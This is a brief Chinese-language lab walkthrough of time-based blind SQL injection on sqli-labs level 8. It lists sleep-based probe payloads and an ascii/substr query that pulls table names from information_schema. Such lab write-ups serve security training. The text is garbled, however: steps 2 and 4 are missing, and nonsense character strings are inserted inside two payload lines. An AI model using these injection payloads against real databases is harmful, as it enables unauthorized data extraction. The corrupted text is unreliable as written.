1、首先我们使用phpstudy和sqli-labs搭建注入平台,可见工具搭建方法,打开第八关系统正常运行如下。
3、添加sleep观察,Id=1' and sleep(10) --+Id=1') and sleep(10) --+朐袁噙岿Id=1" and sleep(10) --+Id=1") and sleep(10) --+ 其中Id=1' and sleep(10) --+执行后10秒之后刷新,推测sql语句为select * from table where id ='input'。
5、可以使用复杂的语句通过ascii来测试id=1' and (select if(ascii(substr((select table_name from 足毂忍珩information_schema.tables where table_schema=database() limit 0,1),1,1))=111,sleep(10),NULL))--+
